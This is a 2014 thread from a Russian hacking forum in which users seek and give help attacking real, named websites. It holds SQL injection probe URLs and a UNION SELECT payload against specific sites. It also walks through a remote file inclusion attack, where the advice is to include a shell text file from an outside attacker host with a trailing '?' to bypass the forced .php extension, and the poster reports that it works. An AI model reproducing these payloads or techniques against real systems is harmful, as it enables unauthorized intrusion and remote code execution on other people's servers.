ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

20.04.2014, 21:41
|
|
Guest
Сообщений: n/a
Провел на форуме: 94006
Репутация:
24
|
|
Кто может помочь подобрать столбцы на Jooml'e
Код:
Code:
http://kinokerch.ru/index.php?option=com_datsogallery&Itemid=30&limitstart=20'
Ребят, надо проучить кидал..
Код:
Code:
http://shop-console.com.ua/contact%27
Кидала
|
|
|
|

01.05.2014, 21:51
|
|
Guest
Сообщений: n/a
Провел на форуме: 1684
Репутация:
0
|
|
Добрый вечер. нашёл на сайте RFI. но есть одно НО.
к примеру ссылка вида http://site.com/index.php?id=user и при добавлении лишнего символа выдаётся:
"Warning: include(user'.php) [function.include]: failed to open stream: No such file or directory in..."
как видите сервер добавляет обязательное расширение ".php".
вопрос следущий: можно ли как-нибудь выполнить shell что бы он выполнялся на стороне жертвы? 0 байт не проходит. посоветовали - со своего сервера отдать файл с расширением .php как простой текст. как это можно сделать?
|
|
|
|

01.05.2014, 22:14
|
|
Guest
Сообщений: n/a
Провел на форуме: 45774
Репутация:
26
|
|
Сообщение от korih
korih said:
Добрый вечер. нашёл на сайте RFI. но есть одно НО.
к примеру ссылка вида http://site.com/index.php?id=user и при добавлении лишнего символа выдаётся:
"Warning: include(user'.php) [function.include]: failed to open stream: No such file or directory in..."
как видите сервер добавляет обязательное расширение ".php".
вопрос следущий: можно ли как-нибудь выполнить shell что бы он выполнялся на стороне жертвы? 0 байт не проходит. посоветовали - со своего сервера отдать файл с расширением .php как простой текст. как это можно сделать?
если действительно rfi, то подставь вот эту ссылку http://hastebin.com/raw/iwafoxapuw вместо user и посмотри выведет ли phpinfo
|
|
|
|

01.05.2014, 22:21
|
|
Guest
Сообщений: n/a
Провел на форуме: 1684
Репутация:
0
|
|
PHP Version 5.1.6
да, вывело
|
|
|
|

01.05.2014, 22:25
|
|
Guest
Сообщений: n/a
Провел на форуме: 45774
Репутация:
26
|
|
Сообщение от korih
korih said:
PHP Version 5.1.6
да, вывело
ну вот, дальше уже сам =)
|
|
|
|

01.05.2014, 22:27
|
|
Guest
Сообщений: n/a
Провел на форуме: 1684
Репутация:
0
|
|
Сообщение от smirk
smirk said:
ну вот, дальше уже сам =)
а как мне сделать, что бы выполняло php код со стороны жертвы, а не моего сервера? объясни пожалуйста) потому что когда я делаю инклуд на php файл своего сервера, то он выполняется на моём сервере. *txt я не могу поставить расширение т.к. сайт жертвы добавляет *.php
|
|
|
|

01.05.2014, 22:40
|
|
Guest
Сообщений: n/a
Провел на форуме: 16399
Репутация:
10
|
|
Предложи ему такую ссылку:
http://elitehacker.ru/shell.txt?
(с вопросом на конце)
есле помог жми +
|
|
|
|

01.05.2014, 22:53
|
|
Guest
Сообщений: n/a
Провел на форуме: 1684
Репутация:
0
|
|
Сообщение от Ganz Euler
Ganz Euler said:
Предложи ему такую ссылку:
http://elitehacker.ru/shell.txt?
(с вопросом на конце)
есле помог жми +
не видит. этот сайт не видет даже в браузере) но за попытку спасибо
|
|
|
|

01.05.2014, 22:59
|
|
Guest
Сообщений: n/a
Провел на форуме: 1684
Репутация:
0
|
|
пошло-поехало! ура! действительно, всё что надо было, это поставить в конце "?". спасибо большое Ganz Euler)
|
|
|
|

06.05.2014, 16:03
|
|
Guest
Сообщений: n/a
Провел на форуме: 6667
Репутация:
0
|
|
Ребят, помогите - нашел уязвимость с 6 полями, но выводить их не хочет...
Слепая ли это и как раскрутить правильно...
http://po.poltava.ua/main.php?l=1+UNION+SELECT+1,2,3,4,5,6--
спасибо...
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|